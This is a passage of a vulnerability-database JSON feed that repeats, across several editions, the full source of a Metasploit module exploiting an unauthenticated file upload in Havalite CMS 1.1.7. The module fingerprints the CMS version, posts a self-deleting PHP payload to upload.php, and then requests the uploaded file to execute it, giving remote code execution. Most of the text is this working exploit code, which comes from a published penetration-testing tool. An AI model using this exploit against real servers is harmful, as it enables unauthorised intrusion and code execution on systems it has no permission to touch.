#{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-20T16:28:32", "differentElements": ["modified", "published"], "edition": 93}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "256696488d2935c452aa3214d8109c9b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-25T14:48:43", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2019-08-25T14:48:43"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:381046138522979793"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2005-1", "OPENSUSE-SU-2019:2007-1", "OPENSUSE-SU-2019:2008-1", "OPENSUSE-SU-2019:1999-1", "OPENSUSE-SU-2019:2000-1", "OPENSUSE-SU-2019:1997-1", "OPENSUSE-SU-2019:1989-1", "OPENSUSE-SU-2019:1990-1", "OPENSUSE-SU-2019:1994-1", "OPENSUSE-SU-2019:1988-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1896-1:572E2", "DEBIAN:DSA-4508-1:2E656", "DEBIAN:DSA-4507-1:28A22", "DEBIAN:DSA-4506-1:6D735", "DEBIAN:DLA-1894-1:39DBA", "DEBIAN:DLA-1895-1:5ADC9"]}, {"type": "mskb", "idList": ["KB4490495"]}, {"type": "threatpost", "idList": ["THREATPOST:89347D07FB03DE484AD22F0B2615197E"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154197"]}], "modified": "2019-08-25T14:48:43"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-25T14:48:43", "differentElements": ["modified", "published"], "edition": 94}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-25T16:51:36", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2019-08-25T16:51:36"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:381046138522979793"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2005-1", "OPENSUSE-SU-2019:2007-1", "OPENSUSE-SU-2019:2008-1", "OPENSUSE-SU-2019:1999-1", "OPENSUSE-SU-2019:2000-1", "OPENSUSE-SU-2019:1997-1", "OPENSUSE-SU-2019:1989-1", "OPENSUSE-SU-2019:1990-1", "OPENSUSE-SU-2019:1994-1", "OPENSUSE-SU-2019:1988-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1896-1:572E2", "DEBIAN:DSA-4508-1:2E656", "DEBIAN:DSA-4507-1:28A22", "DEBIAN:DSA-4506-1:6D735", "DEBIAN:DLA-1894-1:39DBA", "DEBIAN:DLA-1895-1:5ADC9"]}, {"type": "mskb", "idList": ["KB4490495"]}, {"type": "threatpost", "idList": ["THREATPOST:89347D07FB03DE484AD22F0B2615197E"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154197"]}], "modified": "2019-08-25T16:51:36"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-25T16:51:36", "differentElements": ["sourceData"], "edition": 95}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "ebd00bcd8f62fd87e7aeeeb365c70a45", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-03T16:32:28", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 5.5, "vector": "NONE", "modified": "2019-09-03T16:32:28"}, "dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2019:2631", "RHSA-2019:2630", "RHSA-2019:2628", "RHSA-2019:2621", "RHSA-2019:2609", "RHSA-2019:2607", "RHSA-2019:2606"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2059-1", "OPENSUSE-SU-2019:2058-1", "OPENSUSE-SU-2019:2057-1", "OPENSUSE-SU-2019:2052-1", "OPENSUSE-SU-2019:2051-1", "OPENSUSE-SU-2019:2050-1", "OPENSUSE-SU-2019:2056-1"]}, {"type": "exploitdb", "idList": ["EDB-ID:47348", "EDB-ID:47346", "EDB-ID:47347"]}, {"type": "ubuntu", "idList": ["USN-4119-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142840"]}, {"type": "samba", "idList": ["SAMBA:CVE-2019-10197"]}], "modified": "2019-09-03T16:32:28"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-03T16:32:28", "differentElements": ["sourceData"], "edition": 96}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-03T18:32:22", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 2.6, "vector": "NONE", "modified": "2019-09-03T18:32:22"}, "dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2019:2631", "RHSA-2019:2630", "RHSA-2019:2628", "RHSA-2019:2621", "RHSA-2019:2609", "RHSA-2019:2607", "RHSA-2019:2606"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2059-1", "OPENSUSE-SU-2019:2058-1", "OPENSUSE-SU-2019:2057-1", "OPENSUSE-SU-2019:2052-1", "OPENSUSE-SU-2019:2051-1", "OPENSUSE-SU-2019:2050-1", "OPENSUSE-SU-2019:2056-1"]}, {"type": "exploitdb", "idList": ["EDB-ID:47348", "EDB-ID:47346", "EDB-ID:47347"]}, {"type": "ubuntu", "idList": ["USN-4119-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142840"]}, {"type": "samba", "idList": ["SAMBA:CVE-2019-10197"]}], "modified": "2019-09-03T18:32:22"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-03T18:32:22", "differentElements": ["modified", "published"], "edition": 97}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "256696488d2935c452aa3214d8109c9b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-07T00:54:42", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 1.4, "vector": "NONE", "modified": "2019-09-07T00:54:42"}, "dependencies": {"references": [{"type": "gentoo", "idList": ["GLSA-201909-06", "GLSA-201909-05", "GLSA-201909-04", "GLSA-201909-02", "GLSA-201909-01"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2077-1", "OPENSUSE-SU-2019:2078-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1912-1:CAAA9", "DEBIAN:DLA-1911-1:FFE7F", "DEBIAN:DSA-4517-1:44A46", "DEBIAN:DLA-1910-1:9557C"]}, {"type": "thn", "idList": ["THN:291CB82C918B55804078A040F3258456", "THN:FF07DE65AF5F03EDE8E6AF8F1D180CA1"]}, {"type": "mskb", "idList": ["KB3061064"]}, {"type": "exploitdb", "idList": ["EDB-ID:47356"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-2591", "ELSA-2019-2663"]}, {"type": "cert", "idList": ["VU:672565"]}, {"type": "ubuntu", "idList": ["USN-4124-1"]}], "modified": "2019-09-07T00:54:42"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-07T00:54:42", "differentElements": ["modified", "published"], "edition": 98}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-07T03:02:04", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 1.2, "vector": "NONE", "modified": "2019-09-07T03:02:04"}, "dependencies": {"references": [{"type": "gentoo", "idList": ["GLSA-201909-06", "GLSA-201909-05", "GLSA-201909-04", "GLSA-201909-01", "GLSA-201909-02", "GLSA-201909-03"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2077-1", "OPENSUSE-SU-2019:2078-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1912-1:CAAA9", "DEBIAN:DLA-1911-1:FFE7F", "DEBIAN:DSA-4517-1:44A46", "DEBIAN:DLA-1910-1:9557C"]}, {"type": "thn", "idList": ["THN:291CB82C918B55804078A040F3258456", "THN:FF07DE65AF5F03EDE8E6AF8F1D180CA1"]}, {"type": "mskb", "idList": ["KB3061064"]}, {"type": "exploitdb", "idList": ["EDB-ID:47356"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-2591", "ELSA-2019-2663"]}, {"type": "cert", "idList": ["VU:672565"]}], "modified": "2019-09-07T03:02:04"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-07T03:02:04", "differentElements": ["modified", "published"], "edition": 99}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "256696488d2935c452aa3214d8109c9b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. 